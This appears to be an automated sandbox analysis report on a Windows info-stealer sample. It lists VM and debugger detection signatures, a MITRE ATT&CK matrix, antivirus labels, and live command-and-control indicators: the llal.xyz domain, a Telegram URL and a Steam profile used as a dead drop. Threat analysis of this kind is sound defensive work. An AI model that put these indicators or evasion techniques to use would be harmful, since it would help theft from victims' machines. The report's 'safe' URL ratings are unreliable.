Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: OXoeX1Ii3x.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: OXoeX1Ii3x.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_0017FC35 push ecx; ret 0_2_0017FC48
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | API coverage: 3.5 %
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Code function: 0_2_00147A82 __EH_prolog3_GS,FindFirstFileA,PathMatchSpecA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,FindClose,FindClose,0_2_00147A82
Source: Amcache.hve.3.dr | Binary or memory string: VMware
Source: Amcache.hve.3.dr | Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.3.dr | Binary or memory string: vmci.syshbin
Source: Amcache.hve.3.dr | Binary or memory string: VMware, Inc.
Source: Amcache.hve.3.dr | Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.3.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.3.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: OXoeX1Ii3x.exe, 00000000.00000002.1870239685.000000000301E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.000000000301E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.1870239685.0000000002FBE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: Amcache.hve.3.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.3.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.3.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.3.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.dr | Binary or memory string: vmci.sys
Source: Amcache.hve.3.dr | Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.3.dr | Binary or memory string: vmci.syshbin`
Source: Amcache.hve.3.dr | Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.3.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.3.dr | Binary or memory string: VMware20,1
Source: Amcache.hve.3.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.3.dr | Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.3.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.3.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.3.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.3.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.3.dr | Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.3.dr | Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.3.dr | Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.3.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.3.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Code function: 0_2_0015D3D0 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0015D3D0
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Code function: 0_2_0015C2B7 mov eax, dword ptr fs:[00000030h]0_2_0015C2B7
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Code function: 0_2_001587FB __EH_prolog3_GS,GetProcessHeap,HeapFree,Sleep,0_2_001587FB
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Code function: 0_2_0015CA6E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0015CA6E
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Code function: 0_2_0015D3D0 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0015D3D0
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Code function: 0_2_0015D535 SetUnhandledExceptionFilter,0_2_0015D535
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Code function: 0_2_0016B6EC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0016B6EC
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Code function: 0_2_0015D1DF cpuid 0_2_0015D1DF
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Code function: GetLocaleInfoW,0_2_001720A9
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Code function: EnumSystemLocalesW,0_2_00178EA7
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Code function: EnumSystemLocalesW,0_2_00178EA5
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Code function: EnumSystemLocalesW,0_2_00178EF2
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Code function: EnumSystemLocalesW,0_2_00178F8D
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00179020
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Code function: GetLocaleInfoW,0_2_00179280
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_001793A9
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Code function: GetLocaleInfoW,0_2_001794AF
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00179585
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Code function: EnumSystemLocalesW,0_2_00171B7D
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Code function: 0_2_00164EC6 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,0_2_00164EC6
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Code function: 0_2_00172B10 GetTimeZoneInformation,0_2_00172B10
Source: Amcache.hve.3.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.3.dr | Binary or memory string: msmpeng.exe
Source: Amcache.hve.3.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.3.dr | Binary or memory string: MsMpEng.exe
MITRE ATT&CK matrix (a number in parentheses is the count of matched signatures for that technique):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | DLL Side-Loading (1) | Process Injection (1) | Masquerading (1) | OS Credential Dumping | System Time Discovery (2) | Remote Services | Archive Collected Data (1) | Encrypted Channel (11) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | DLL Side-Loading (1) | Virtualization/Sandbox Evasion (1) | LSASS Memory | Security Software Discovery (41) | Remote Desktop Protocol | Data from Removable Media | Ingress Tool Transfer (2) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Process Injection (1) | Security Account Manager | Virtualization/Sandbox Evasion (1) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (2) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Deobfuscate/Decode Files or Information (1) | NTDS | Process Discovery (1) | Distributed Component Object Model | Input Capture | Application Layer Protocol (13) | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Obfuscated Files or Information (2) | LSA Secrets | File and Directory Discovery (1) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | DLL Side-Loading (1) | Cached Domain Credentials | System Information Discovery (22) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
Source | Detection | Scanner | Label
OXoeX1Ii3x.exe | 53% | Virustotal |
OXoeX1Ii3x.exe | 68% | ReversingLabs | Win32.Spyware.Acrstealer
OXoeX1Ii3x.exe | 100% | Avira | TR/AVI.Ransom.faqrc
OXoeX1Ii3x.exe | 100% | Joe Sandbox ML |
No Antivirus matches
Source | Detection | Scanner | Label
https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842du | 0% | Avira URL Cloud | safe
https://llal.xyz/ | 0% | Avira URL Cloud | safe
https://llal.xyz | 0% | Avira URL Cloud | safe
https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842d | 0% | Avira URL Cloud | safe
https://llal.xyz/I | 0% | Avira URL Cloud | safe
https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842d$ | 0% | Avira URL Cloud | safe
https://https://t.me/asdfghjrrewqqqqtfg/ujs/WorldHellostrwvfncexGostrbrCHbrGkunknownftpac/Up/gltype | 0% | Avira URL Cloud | safe
https://community.fa4 | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
steamcommunity.com | 104.102.49.254 | true | false | | high
llal.xyz | 188.114.97.3 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842d | true | Avira URL Cloud: safe | unknown
https://steamcommunity.com/profiles/76561199619938930 | false | | high
                                                                                                      https://steamcommunity.com/market/OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                        high
                                                                                                        https://store.steampowered.com/news/OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                          high
                                                                                                          https://steamcommunity.com/profiles/76561199619938930-OXoeX1Ii3x.exe, 00000000.00000002.1870239685.0000000002FBE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842d$OXoeX1Ii3x.exe, 00000000.00000003.1693936827.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.1870379982.000000000302E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            http://store.steampowered.com/subscriber_agreement/OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                              high
                                                                                                              https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgOXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                high
                                                                                                                https://recaptcha.net/recaptcha/;OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://steamcommunity.com/discussions/OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                    high
                                                                                                                    https://steamcommunity.com/profiles/76561199619938930/badgesOXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                      high
                                                                                                                      https://store.steampowered.com/stats/OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                        high
                                                                                                                        https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amOXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                          high
                                                                                                                          https://medal.tvOXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://broadcast.st.dl.eccdnx.comOXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngOXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                high
                                                                                                                                https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&aOXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://store.steampowered.com/steam_refunds/OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://steamcommunity.com/profiles/76561199619938930VOXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&aOXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=eOXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://steamcommunity.com/workshop/OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://login.steampowered.com/OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_cOXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://store.steampowered.com/legal/OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://steamcommunity.com/profiles/76561199619938930HOXoeX1Ii3x.exe, 00000000.00000002.1870239685.0000000002FBE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://community.fa4OXoeX1Ii3x.exe, 00000000.00000002.1870057539.0000000002CFC000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      unknown
                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=enOXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003031000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=engOXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003031000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&aOXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=englOXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://recaptcha.netOXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://upx.sf.netAmcache.hve.3.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://store.steampowered.com/76561199619938930[1].htm.0.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=eOXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.pngOXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://127.0.0.1:27060OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg76561199619938930[1].htm.0.drfalse
                                                                                                                                                                            high
